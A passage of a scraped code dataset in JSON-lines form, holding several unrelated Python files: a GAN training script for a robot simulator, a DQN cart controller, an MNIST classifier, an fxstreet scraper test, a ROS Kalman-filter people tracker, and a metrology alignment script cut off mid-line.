file.endswith(\".bin\")]\r\n\t\t\tfor f in files:\r\n\t\t\t\toutput_path = input_path + '/' + f.split('.')[0][:-1*len('Compressed')] + 'Decompressed.txt'\r\n\t\t\t\tdecoder = HuffmanDecoder(input_path + '/' + f, output_path)\r\n\t\t\t\tdecoder.decodeFile()\r\n\t\t\t\tprint(\"Decompression Successful.\")\r\n\telse:\r\n\t\tprint('Invalid Mode.')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n\r\n","sub_path":"huff.py","file_name":"huff.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"225295926","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 28 00:27:41 2021\r\n\r\n@author: qiang\r\n\"\"\"\r\n\r\nimport cv2\r\ndef preprocess_observation_(observation, bit_depth):\r\n observation.div_(2 ** (8 - bit_depth)).floor_().div_(2 ** bit_depth).sub_(0.5) # Quantise to given bit depth and centre\r\n observation.add_(torch.rand_like(observation).div_(2 ** bit_depth)) # Dequantise (to approx. match likelihood of PDF of continuous images vs. PMF of discrete images)\r\n\r\n# Postprocess an observation for storage (from float32 numpy array [-0.5, 0.5] to uint8 numpy array [0, 255])\r\ndef postprocess_observation(observation, bit_depth):\r\n return np.clip(np.floor((observation + 0.5) * 2 ** bit_depth) * 2 ** (8 - bit_depth), 0, 2 ** 8 - 1).astype(np.uint8)\r\n\r\ndef _images_to_observation(images, bit_depth):\r\n # print(images)\r\n images = torch.tensor(cv2.resize(images, (128,128), interpolation=cv2.INTER_LINEAR).transpose(2, 0, 1), dtype=torch.float32) # Resize and put channel first\r\n preprocess_observation_(images, bit_depth) # Quantise, centre and dequantise inplace\r\n # return images.unsqueeze(dim=0) # Add batch dimension\r\n return images\r\n\r\ndef pre_pos(images):\r\n image = cv2.resize(images, (128,128), interpolation=cv2.INTER_LINEAR).transpose(2, 0, 1)\r\n image = image.astype(np.float32)\r\n image /= 255.0\r\n return image\r\n\r\nfrom CoppeliaSim_RGAN import CoppeliaSim_RGAN\r\nenv = CoppeliaSim_RGAN()\r\nenv.reset()\r\n\r\n# from __future__ import print_function\r\nimport random\r\nimport os\r\nfrom torch.nn import functional as F\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.optim as optim\r\nimport torchvision.utils as vutils\r\nfrom torch.autograd import Variable\r\nfrom utils import lineplot\r\n\r\nimport networkRGAN\r\nfrom torchsummary import summary\r\n\r\nnp.random.seed(42)\r\nrandom.seed(10)\r\ntorch.backends.cudnn.deterministic = True\r\ntorch.backends.cudnn.benchmark = False\r\ntorch.manual_seed(999)\r\n\r\nmetrics = {'steps': [],'observation_loss': []}\r\n\r\n\r\ngpu_id = 0\r\ndevice = torch.device(\"cuda\", gpu_id)\r\n\r\n\r\nEncoder = torch.load('Encoder_10000.pt')\r\nDecoder = torch.load('Decoder_10000.pt')\r\nDis = torch.load('Dis_10000.pt')\r\n\r\n# Here is where you set how important each component of the loss function is:\r\nL1_factor = 0\r\nL2_factor = 1\r\nGAN_factor = 1\r\nRec_factor = 0.2\r\n\r\ncriterion = nn.BCELoss() # Binary cross entropy loss\r\n\r\n# Optimizers for the generator and the discriminator (Adam is a fancier version of gradient descent with a few more bells and whistles that is used very often):\r\noptimizerDis = optim.Adam(Dis.parameters(), lr = 0.0001, betas = (0.5, 0.999))\r\noptimizerEncoder = optim.Adam(Encoder.parameters(), lr = 0.0001, betas = (0.5, 0.999), eps = 1e-8)\r\noptimizerDecoder = optim.Adam(Decoder.parameters(), lr = 0.0001, betas = (0.5, 0.999), eps = 1e-8)\r\n\r\ndef create_batch_data(environment,\r\n batch_size,\r\n picture_size=128):\r\n\r\n Rel = np.ones((batch_size, 3,picture_size,picture_size))\r\n Pre = np.ones((batch_size, 3,picture_size,picture_size))\r\n \r\n action = torch.from_numpy(env.action_space.sample()) \r\n next_obs, done= env.step(action)\r\n \r\n for i in range(batch_size):\r\n if done == False:\r\n obs = next_obs\r\n elif done == True:\r\n obs = env.reset()\r\n # print(1)\r\n \r\n pic1, pic2 = obs\r\n Pre[i] = pre_pos(pic1)\r\n Rel[i] = pre_pos(pic2)\r\n \r\n action = torch.from_numpy(env.action_space.sample()) \r\n next_obs, done= env.step(action)\r\n \r\n \r\n \r\n return Rel, Pre\r\n\r\n# Create a directory for the output files\r\ndirect_name = 'GAN-v3'\r\nbatch_size = 1\r\nimage_period = 500\r\nmodel_period = 5000\r\n\r\n\r\ntry:\r\n os.mkdir(direct_name)\r\nexcept OSError:\r\n pass\r\nresults_dir = direct_name\r\nt = 0\r\nt_image = int(image_period / batch_size)\r\nt_model = int(model_period / batch_size)\r\ndone = False\r\nfor _ in range(100000):\r\n \r\n\r\n Rel, Pre = create_batch_data(env,batch_size)\r\n\r\n\r\n # TRAINING THE DISCRIMINATOR\r\n Dis.zero_grad()\r\n Rel = torch.tensor(Rel)\r\n real = Variable(Rel).type('torch.FloatTensor').to(device)\r\n target = Variable(torch.ones(real.size()[0])).to(device)\r\n output = Dis(real)\r\n errD_real = criterion(output, target)\r\n \r\n Pre = torch.tensor(Pre)\r\n predict = Variable(Pre).type('torch.FloatTensor').to(device)\r\n generated = Encoder(predict)\r\n generated = Decoder(generated.detach())\r\n \r\n target = Variable(torch.zeros(real.size()[0])).to(device)\r\n output = Dis(generated.detach()) # detach() because we are not training G here\r\n errD_fake = criterion(output, target)\r\n\r\n errD = errD_real + errD_fake\r\n errD.backward() \r\n optimizerDis.step()\r\n\r\n # TRAINING THE GENERATOR\r\n Encoder.zero_grad()\r\n Decoder.zero_grad()\r\n \r\n target = Variable(torch.ones(real.size()[0])).to(device)\r\n output = Dis(generated)\r\n\r\n # G wants to :\r\n # (a) have the synthetic images be accepted by D (= look like frontal images of people)\r\n errG_GAN = criterion(output, target) \r\n errG_Rec = F.mse_loss(real, generated, reduction='none').sum().mean()#data.cpu().numpy()\r\n\r\n errG = (GAN_factor * errG_GAN) + (errG_Rec * Rec_factor)\r\n\r\n errG.backward()\r\n # Update G\r\n optimizerEncoder.step()\r\n optimizerDecoder.step()\r\n\r\n \r\n t += 1 \r\n \r\n print('t = ' + str(t) + ', ' + str(errG_Rec/batch_size))\r\n obs_err = F.mse_loss(real, generated, reduction='none').sum().mean().data.cpu().numpy()\r\n metrics['observation_loss'].append(errG_Rec.cpu().detach().numpy()/batch_size)\r\n metrics['steps'].append(t)\r\n lineplot(metrics['steps'][-len(metrics['observation_loss']):], metrics['observation_loss'], 'observation_loss', results_dir)\r\n \r\n if t % t_image == 0:\r\n vutils.save_image(predict[0].data, direct_name+'/%03d_input.jpg' % (t), normalize=True)\r\n vutils.save_image(real[0].data, direct_name+'/%03d_real.jpg' % (t), normalize=True)\r\n vutils.save_image(generated[0].data, direct_name+'/%03d_generated.jpg' % (t), normalize=True)\r\n \r\n # Save the pre-trained Generator as well\r\n if t % t_model == 0:\r\n tempresults_dir = './'+direct_name+'/%s%d' % ('t',t)\r\n try:\r\n os.mkdir(tempresults_dir)\r\n except OSError:\r\n pass\r\n torch.save(Encoder,tempresults_dir+'/Encoder_%d.pt' % (t))\r\n torch.save(Decoder,tempresults_dir+'/Decoder_%d.pt' % (t))\r\n torch.save(Dis,tempresults_dir+'/Dis_%d.pt' % (t)) \r\n","sub_path":"runRGAN.py","file_name":"runRGAN.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"522838279","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cart_env import CartEnv\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\n\r\n# Hyper Parameters\r\nBATCH_SIZE = 32\r\nLR = 0.02 # learning rate\r\nEPSILON = 0.8 # greedy policy\r\nGAMMA = 0.99 # reward discount\r\nTARGET_REPLACE_ITER = 50 # target update frequency\r\nMEMORY_CAPACITY = 2000\r\n\r\nenv=CartEnv(step_time=0.02)\r\nenv.add_obstacle([[0.5,0.5],[0.5,1],[1.5,0.5],[1.5,1]])\r\n\r\nN_ACTIONS = 3\r\nN_STATES = 3\r\nENV_A_SHAPE = 0\r\n\r\nclass Net(nn.Module):\r\n def __init__(self, ):\r\n super(Net, self).__init__()\r\n self.fc1 = nn.Linear(N_STATES, 15)\r\n self.fc1.weight.data.normal_(0, 0.1) # initialization\r\n self.out = nn.Linear(15, N_ACTIONS)\r\n self.out.weight.data.normal_(0, 0.1) # initialization\r\n\r\n def forward(self, x):\r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n actions_value = self.out(x)\r\n return actions_value\r\n\r\n\r\nclass DQN(object):\r\n def __init__(self):\r\n self.eval_net, self.target_net = Net(), Net()\r\n\r\n self.learn_step_counter = 0 # for target updating\r\n self.memory_counter = 0 # for storing memory\r\n self.memory = np.zeros((MEMORY_CAPACITY, N_STATES * 2 + 2)) # initialize memory\r\n self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR)\r\n self.loss_func = nn.MSELoss()\r\n\r\n def choose_action(self, x):\r\n x = torch.unsqueeze(torch.FloatTensor(x), 0)\r\n # input only one sample\r\n if np.random.uniform() < EPSILON: # greedy\r\n actions_value = self.eval_net.forward(x)\r\n action = torch.max(actions_value, 1)[1].data.numpy()\r\n action = action[0] if ENV_A_SHAPE == 0 else action.reshape(ENV_A_SHAPE) # return the argmax index\r\n else: # random\r\n action = np.random.randint(0, N_ACTIONS)\r\n action = action if ENV_A_SHAPE == 0 else action.reshape(ENV_A_SHAPE)\r\n return action\r\n\r\n def store_transition(self, s, a, r, s_):\r\n transition = np.hstack((s, [a, r], s_))\r\n # replace the old memory with new memory\r\n index = self.memory_counter % MEMORY_CAPACITY\r\n self.memory[index, :] = transition\r\n self.memory_counter += 1\r\n\r\n def learn(self):\r\n # target parameter update\r\n if self.learn_step_counter % TARGET_REPLACE_ITER == 0:\r\n self.target_net.load_state_dict(self.eval_net.state_dict())\r\n self.learn_step_counter += 1\r\n\r\n # sample batch transitions\r\n sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)\r\n b_memory = self.memory[sample_index, :]\r\n b_s = torch.FloatTensor(b_memory[:, :N_STATES])\r\n b_a = torch.LongTensor(b_memory[:, N_STATES:N_STATES+1].astype(int))\r\n b_r = torch.FloatTensor(b_memory[:, N_STATES+1:N_STATES+2])\r\n b_s_ = torch.FloatTensor(b_memory[:, -N_STATES:])\r\n\r\n # q_eval w.r.t the action in experience\r\n q_eval = self.eval_net(b_s).gather(1, b_a) # shape (batch, 1)\r\n q_next = self.target_net(b_s_).detach() # detach from graph, don't backpropagate\r\n q_target = b_r + GAMMA * q_next.max(1)[0].view(BATCH_SIZE, 1) # shape (batch, 1)\r\n loss = self.loss_func(q_eval, q_target)\r\n \r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n\r\ndqn = DQN()\r\n\r\n\r\n# To act greedily, just load the pkl file saved from a training. and set gamma =1\r\n# dqn.eval_net=torch.load('xxxxxxx')\r\n# GAMMA =1\r\n\r\n\r\nprint('\\nCollecting experience...')\r\nfor i_episode in range(300):\r\n state = env.reset()\r\n episode_reward = 0\r\n\r\n # x,y used to plot the trajectory\r\n x=[]\r\n y=[]\r\n plt.ion()\r\n plt.cla()\r\n ax=plt.gca()\r\n\r\n for step in range(1000):\r\n action = dqn.choose_action(state)\r\n\r\n # take action\r\n next_state, reward, done, info = env.step(action)\r\n\r\n x.append(next_state[0])\r\n y.append(next_state[1])\r\n\r\n dqn.store_transition(state, action, reward, next_state)\r\n episode_reward += reward # It's a approximate number, gamma is not considered here\r\n\r\n if dqn.memory_counter > MEMORY_CAPACITY:\r\n dqn.learn()\r\n if done:\r\n print('Episode: ', i_episode,\r\n '| Episode_reward: ', round(episode_reward, 2))\r\n\r\n if done:\r\n break\r\n state = next_state\r\n\r\n\r\n # plot this episode\r\n ax.set_xlim(-0.5,2)\r\n ax.set_ylim(-0.5,2)\r\n plt.title('epoch{0}'.format(i_episode))\r\n ax.plot(x,y)\r\n env.cart_poly.plot(ax,color='green')\r\n env.goal.plot(ax,alpha=0.3,color='red')\r\n env.obstacles[0].plot(ax,alpha=1,color='pink')\r\n plt.pause(0.5)\r\n\r\n\r\n# save the neural network\r\ntorch.save(dqn.eval_net, 'cart_DQN.pkl')","sub_path":"RL_training.py","file_name":"RL_training.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"106483065","text":"import tensorflow as tf \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom sklearn.model_selection import train_test_split\n\nplt.rcParams['figure.figsize'] = (10.0, 8.0)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\ntrain = pd.read_csv('digit-recognizer/train.csv')\ntest = pd.read_csv('digit-recognizer/test.csv')\n\n### transform train and test into image/label\nx_train = train.drop(['label'], axis=1).values.astype('float32') # all pixel values\ny_train = train['label'].values.astype('int32') # only labels i.e targets digits\ntest = test.values.astype('float32')\n\nx_train = x_train.reshape(x_train.shape[0], 28, 28) / 255.0\ntest = test.reshape(test.shape[0], 28, 28) / 255.0\n\n\nx_train, x_test, y_train, y_val = train_test_split(x_train, y_train, test_size = 0.1, random_state=42)\n##plt.imshow(x_train[0])\n##print(y_train[0])\n##plt.show()#\n\nmodel = tf.keras.models.Sequential()\nmodel.add(tf.keras.layers.Flatten())\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(10,activation = tf.nn.softmax))#\n\nmodel.compile(optimizer =\"adam\",\n\tloss =\"sparse_categorical_crossentropy\",\n\tmetrics = ['accuracy'])#\n\nmodel.fit(x_train, y_train,epochs = 3)#\n\nval_loss, val_acc = model.evaluate(x_test, y_val)\nprint(val_loss,val_acc)\nmodel.save(\"method2.model\")\nprint(type(test))\nmodel2 = tf.keras.models.load_model(\"method2.model\")\npredictions = model2.predict(test)\n\nf = open(\"testresults.csv\",\"w+\")\nf.write(\"ImageId,Label\"+\"\\n\")\ni = 0\nfor nums in predictions:\n\ti+=1\n\tf.write(str(i)+\",\"+str(np.argmax(predictions[i-1]))+'\\n')\nf.close()\n#results = np.argmax(predictions)\n#print(predictions[0])\n#print(predictions.shape)\n\n#print(np.argmax(predictions[0]))\n#plt.imshow(test[0])\n#plt.show()\n\n\n","sub_path":"MNIST_image_recognition/method2.py","file_name":"method2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"446634560","text":"\n\n#calss header\nclass _ROLE():\n\tdef __init__(self,): \n\t\tself.name = \"ROLE\"\n\t\tself.definitions = [u'the position or purpose that someone or something has in a situation, organization, society, or relationship: ', u\"an actor's part in a film or play: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_role.py","file_name":"_role.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296180793","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport FinanceBot.scrapers.fxstreet as fxstreet\nfrom mock import Mock\nfrom nose import tools\nimport os\nimport datetime\nimport pytz\nthis_dir = os.path.dirname(os.path.abspath(__file__))\nHEADER_REF = {'content-length': '85360',\n 'x-aspnet-version': '4.0.30319',\n 'set-cookie': 'ASP.NET_SessionId=tabildbdzzqmaknsc5l4mjcr; path=/; HttpOnly',\n 'x-powered-by': 'ASP.NET',\n 'server': 'Microsoft-IIS/8.0',\n 'connection': 'close',\n 'cache-control': 'private',\n 'date': 'Fri, 27 Mar 2015 14:15:21 GMT',\n 'content-type': 'text/html; charset=utf-8'}\nREFERENCE = (datetime.datetime(2015, 3, 27, 23, 15, 21, tzinfo=pytz.timezone('Asia/Tokyo')),\n {'EURJPY': {'high': 129.885, 'bid': 129.548, 'open': 129.727, 'low': 129.032, 'change': -0.167},\n 'USDCHF': {'high': 0.9694, 'bid': 0.9612, 'open': 0.9629, 'low': 0.9607, 'change': -0.0017},\n 'GBPUSD': {'high': 1.4922, 'bid': 1.4914, 'open': 1.4849, 'low': 1.4797, 'change': 0.0064},\n 'EURGBP': {'high': 0.7336, 'bid': 0.7304, 'open': 0.733, 'low': 0.7266, 'change': -0.0025},\n 'EURCHF': {'high': 1.051, 'bid': 1.0466, 'open': 1.0482, 'low': 1.0455, 'change': -0.0016},\n 'GBPJPY': {'high': 177.939, 'bid': 177.447, 'open': 176.985, 'low': 176.704, 'change': 0.46},\n 'AUDUSD': {'high': 0.7837, 'bid': 0.7785, 'open': 0.7828, 'low': 0.7775, 'change': -0.0043},\n 'EURUSD': {'high': 1.0898, 'bid': 1.0888, 'open': 1.0884, 'low': 1.0801, 'change': 0.0004},\n 'GBPCHF': {'high': 1.4406, 'bid': 1.4335, 'open': 1.4302, 'low': 1.4296, 'change': 0.0036},\n 'USDJPY': {'high': 119.5, 'bid': 118.982, 'open': 119.188, 'low': 118.928, 'change': -0.205},\n 'USDCAD': {'high': 1.253, 'bid': 1.2508, 'open': 1.2483, 'low': 1.2466, 'change': 0.0025},\n 'GBPCAD': {'high': 1.8658, 'bid': 1.8654, 'open': 1.8536, 'low': 1.8523, 'change': 0.0117}})\n\n\ndef test_get_currency():\n fxstreet.urllib.urlopen = Mock()\n fxstreet.urllib.urlopen.return_value.read.return_value = open(this_dir + '/test_data/forex-rates.html').read()\n fxstreet.urllib.urlopen.return_value.headers.dict = HEADER_REF\n scraper = fxstreet.FxstreetScraper()\n tools.eq_(scraper.get_currency(), REFERENCE)\n","sub_path":"test/scrapers/test_fxstreet.py","file_name":"test_fxstreet.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"403013653","text":"# -*- coding:utf-8 -*-\n__author__ = 'IanChen'\n\n''' 纯文本文件 city.txt为城市信息, 里面的内容(包括花括号)如下所示:\n\n{\n \"1\" : \"上海\",\n \"2\" : \"北京\",\n \"3\" : \"成都\"\n}\n'''\n\nfrom collections import OrderedDict\nimport json,xlwt\n\nwith open(\"wenben2.txt\",'r') as f:\n data = json.load(f,object_pairs_hook=OrderedDict)#顺序是跟text中定义的顺序是一样的\n workbook=xlwt.Workbook()\n sheet= workbook.add_sheet(\"city\",cell_overwrite_ok=True)\n for index,(key,value) in enumerate(data.items()):\n sheet.write(index,0,key)\n sheet.write(index,1,value)\n workbook.save(\"F:/excercise/002/table/city.xls\")\n","sub_path":"excercise-master/002/question0015.py","file_name":"question0015.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"419367557","text":"#! /usr/bin/env python\nfrom logging import Logger\nimport logging\nfrom os import cpu_count\nimport numpy as np\nimport rospy\nfrom fairmot_ros_wzq.msg import people_item ,people_list\nfrom sensor_msgs.msg import PointCloud\nfrom geometry_msgs.msg import PoseStamped\nfrom nlink_example.msg import UwbFilter\nimport message_filters\nfrom numpy import matrixlib as mt\n\ngoal_ID = 0 # 追踪ID\nID_list = [] # ID追踪列表\nlist_max = 100 # ID追踪最大存储个数\ncount = 0 # 判断初始化\nstored_points = [] # 存储轨迹点\nign = 0\nmax_ign = 5\nlost = False\n\nclass kalman_filter():\n def __init__(self, A, B, H, R, Q, x0, P0):\n self.A = mt.mat(np.array(A, dtype=np.float32))\n self.B = mt.mat(np.array(B, dtype=np.float32))\n self.H = mt.mat(np.array(H, dtype=np.float32))\n self.R = mt.mat(np.array(R, dtype=np.float32))\n self.Q = mt.mat(np.array(Q, dtype=np.float32))\n self.x0 = mt.mat(np.array(x0, dtype=np.float32))\n self.P0 = mt.mat(np.array(P0, dtype=np.float32))\n self.x_pre = self.x0\n self.P_pre = self.P0\n\n self.K = (self.P0*self.H.T)*((self.H*self.P0*self.H.T+self.R).I)\n # print(self.x_pre)\n self.I = np.eye((self.K*self.H).shape[0],(self.K*self.H).shape[1])\n\n # 无外加控制\n self.u = 0.\n def run(self, data):\n z = mt.mat(np.array([[data[0]],[data[1]]], dtype=np.float32))\n self.predict()\n self.update(z)\n\n return self.x_pre, self.P_pre \n\n def predict(self):\n self.x_pre = self.A*self.x_pre + self.B*self.u\n self.P_pre = self.A*self.P_pre*self.A.T + self.Q\n \n def update(self, z):\n self.K = (self.P_pre*self.H.T)*((self.H*self.P_pre*self.H.T+self.R).I)\n self.x_pre = self.x_pre + self.K*(z - self.H*self.x_pre)\n self.P_pre = (self.I - self.K*self.H)*self.P_pre\n\nclass trajectory(object):\n def __init__(self, image_points, uwb_points, A,B,H,R1,Q1,R2,Q2,x0_i,x0_u,P0):\n self.image_track = []\n self.uwb_track = []\n self.mix_track = []\n self.image_track.append(image_points)\n self.uwb_track.append(uwb_points)\n \n self.ign = 0\n self.max_ign = 5\n\n self.max_points = 50\n self.count = len(self.image_track)\n\n self.kalman_filter = []\n filter1=kalman_filter(A,B,H,R1,Q1,x0_i,P0)\n filter2=kalman_filter(A,B,H,R2,Q2,x0_u,P0)\n self.kalman_filter.append(filter1)\n self.kalman_filter.append(filter2)\n\n def update(self, image_point, uwb_point): # 更新轨迹,利用uwb点对image点插值\n x_uwb, P_uwb = self.kalman_filter[1].run(uwb_point)\n if len(self.uwb_track)>=self.max_points:\n self.uwb_track.pop(0)\n self.uwb_track.append(x_uwb)\n else:\n self.uwb_track.append(x_uwb)\n\n if image_point == []:\n if len(self.image_track)<=4:\n image_point = self.diff(self.image_track)\n else:\n # 曲线拟合\n # x,y = self.gather(self.image_track, 2)\n # print(self.image_track)\n # print(x)\n # print(y)\n # p = np.polyfit(x,y,2)\n # x_pre = uwb_point[0]\n # y_pre = np.polyval(p,x_pre)\n # image_point = [x_pre, y_pre, self.image_track[self.count-1][2]]\n \n # 插值\n # points = []\n # for i in range(4):\n # points.append(self.image_track[len(self.image_track)-4+i])\n # image_point = self.diff(points)\n image_point = [self.image_track[self.count-1][0,0],\n self.image_track[self.count-1][1,0]]\n\n x_image, P_image = self.kalman_filter[0].run(image_point)\n\n if len(self.image_track)>=self.max_points:\n self.image_track.pop(0)\n self.image_track.append(x_image)\n else:\n self.image_track.append(x_image)\n self.count = self.count + 1\n \n P_mix = (P_uwb.I+P_image.I).I\n x_mix = P_mix*(P_uwb.I*x_uwb + P_image.I*x_image)\n self.mix_track.append(x_mix)\n \n # 计算轨迹行进方向\n if len(self.mix_track)<6:\n orientation = np.array([[1],[0]], dtype=np.float32)\n else:\n l = len(self.mix_track)\n s1 = np.array(np.zeros((2,1)), dtype=np.float32)\n s2 = np.array(np.zeros((2,1)), dtype=np.float32)\n for i in range(l-4,l-2):\n s1 = s1 + self.mix_track[i].getA()/2\n for i in range(l-2,l):\n s2 = s2 + self.mix_track[i].getA()/2\n orientation = s2 - s1\n \n yaw = np.math.atan(orientation[1]/orientation[0])*360/(2*np.math.pi) \n roll = 0\n pitch = 0\n cy = np.math.cos(yaw*np.math.pi/360)\n sy = np.math.sin(yaw*np.math.pi/360)\n cp = np.math.cos(pitch*np.math.pi/360)\n sp = np.math.sin(pitch*np.math.pi/360)\n cr = np.math.cos(roll*np.math.pi/360)\n sr = np.math.sin(roll*np.math.pi/360)\n qw = cy*cp*cr+sy*sp*sr\n qx = cy*cp*sr-sy*sp*cr\n qy = sy*cp*sr+cy*sp*cr\n qz = sy*cp*cr-cy*sp*sr\n q = [qw,qx,qy,qz]\n \n return x_image, x_uwb, x_mix, q\n\n def diff(self, points):\n x = [p[0] for p in points]\n y = [p[1] for p in points]\n if len(points)==1:\n x_pre = x[0]\n y_pre = y[0]\n else:\n x1 = np.mean([x[i] for i in range(len(points)//2)])\n x2 = np.mean([x[i] for i in range(len(points)//2,len(points))])\n y1 = np.mean([y[i] for i in range(len(points)//2)])\n y2 = np.mean([y[i] for i in range(len(points)//2,len(points))])\n x_pre = x2+(x2-x1)*(1/2+1/(len(points)//2))\n y_pre = y2+(y2-y1)*(1/2+1/(len(points)//2))\n point_pre = [x_pre,y_pre]\n\n return point_pre\n \n def gather(self,points,n):\n x = [point[0] for point in self.image_track]\n y = [point[1] for point in self.image_track]\n i = 0\n count = 0\n sum_x = 0\n sum_y = 0\n gather_x = []\n gather_y = []\n while imax_ign: # 判断是否应该丢失目标\n lost = True\n else:\n lost = False\n \n\n\n \ndef callback(people_list_data, uwb_data):\n global count, track\n\n image_point = []\n uwb_point = [uwb_data.point.x, uwb_data.point.y, uwb_data.point.z]\n if (count == 0): # 初始化目标ID\n if people_list_data.people_items:\n init_ID(people_list_data)\n for item in people_list_data.people_items:\n if item.people_ID == goal_ID:\n image_point = [item.points.x,item.points.y,item.points.z]\n track = trajectory(image_point, uwb_point,\n A=[[1,0],[0,1]],\n B=0,H=[[1,0],[0,1]],\n R1=[[0.01,0],[0,0.01]],\n Q1=[[0.0001,0],[0,0.0001]],\n R2=[[0.01,0],[0,0.01]],\n Q2=[[0.0001,0],[0,0.0001]],\n x0_i=[[image_point[0]],[image_point[1]]],\n x0_u=[[uwb_point[0]],[uwb_point[1]]],\n P0=[[1,0],[0,1]])\n count = count + 1\n else:\n Logger.info('At the beginning, can not find person!')\n elif (count>0): # \n if people_list_data.people_items:\n for item in people_list_data.people_items:\n if item.people_ID == goal_ID:\n image_point = [item.points.x,item.points.y,item.points.z]\n update_ID(people_list_data, uwb_data)\n # 存储更新image、uwb轨迹点\n x_img, x_uwb, x_mix, orientation = track.update(image_point, uwb_point)\n goal_msg = PoseStamped()\n goal_msg.header.frame_id = 'map'\n goal_msg.header.stamp = rospy.Time.now()\n goal_msg.pose.position.x = x_mix[0][0]\n goal_msg.pose.position.y = x_mix[1][0]\n goal_msg.pose.orientation.w = orientation[0]\n goal_msg.pose.orientation.x = orientation[1]\n goal_msg.pose.orientation.y = orientation[2]\n goal_msg.pose.orientation.z = orientation[3]\n goal_pub.publish(goal_msg)\n count = count + 1\n\n else:\n Logger.info('Can not find person, please put yourself forward the camera!')\n\n \n\n\ndef goal():\n rospy.init_node(\"goal\", anonymous=True)\n people_list_data = message_filters.Subscriber(\"people_list\", people_list)\n # rslidar_points = message_filters.Subscriber(\"rslidar_points\", PointCloud2)\n uwb_data = message_filters.Subscriber(\"uwb_filter\", UwbFilter)\n # sub = message_filters.ApproximateTimeSynchronizer([people_centriod, rslidar_points, uwb_filter], 10, 1, allow_headerless=True)\n sub = message_filters.ApproximateTimeSynchronizer([people_list_data, uwb_data], 10, 1, allow_headerless=False)\n sub.registerCallback(callback)\n \n rospy.spin()\n\n\nif __name__=='__main__':\n goal_pub = rospy.Publisher('goal', PoseStamped, queue_size=10)\n goal()","sub_path":"scripts/goal.py","file_name":"goal.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"339844819","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 7 21:47:49 2020\n@author: apple\n\"\"\"\nimport csv\nimport numpy as np\n\n#import matplotlib.pyplot as plt\n#import shapely\nfrom shapely.geometry import LineString, Point\nimport math \n\nfrom func_Metrology import GC,GC2,angle,rotate, length, dotproduct, Tria, GCenter\nfrom numpy import genfromtxt\nimport pandas as pd\n\n#xls = pd.read_excel('data1.xlsx')\n#df = pd.read_excel(xls, 'Sheet1')\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_R2_with_standard_bot_re\")\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_R2_with_standard\")\ndf = pd.read_excel(\"data2.xlsx\", \"Module4_brown\")\n\n#df = pd.read_excel(\"data2.xlsx\", \"Module4_brown\")\n\ndf1 = pd.DataFrame(df, columns= ['x'])\ndf2 = pd.DataFrame(df, columns= ['y'])\n\npx = df1['x']; py = df2['y']\n\n\nnt = []; nb = []; mt = []; mb = []\nfor x in range(0,4):\n nt.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(4,8):\n nb.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(8,12):\n mt.append(np.array([px[x],py[x]],dtype=np.float))\nfor x in range(12,16):\n mb.append(np.array([px[x],py[x]],dtype=np.float)) \n\n#print('array nt = ',nt, '\\n\\narray nb = ',nb, '\\n\\narray mt = ',mt, '\\n\\narray mb = ',mb)\nprint('\\narray mt = ',mt, '\\narray mb = ',mb)\n\n\n\n\ntrans_rotated_mt_2 = [np.array([2314.01, 2364.18]), np.array([104393.25, -209.71]), np.array([106746.27, 93352.62]), np.array([ 4671.45, 95931.25])]\ntop_sensor_after_translation = [np.array([6860.15320168, -687.608018 ]), np.array([108948.99320168, 2250.991982 ]), np.array([106257.35320168, 95817.821982 ]), np.array([ 4172.63320168, 92879.781982 ])]\n\n\no_b = GCenter(trans_rotated_mt_2) #GC of top needle frame\n\nnb_dig=[]\nfor x in top_sensor_after_translation:\n nb_dig.append(x - o_b)\ntrans_nt_dig=[]\nfor x in trans_rotated_mt_2:\n trans_nt_dig.append(x - o_b)\n\nA=[0,0,0,0]\nfor i in range(4):\n A[i]= angle(nb_dig[i],trans_nt_dig[i])\nprint('Angle 1 of rotation in radian= ', 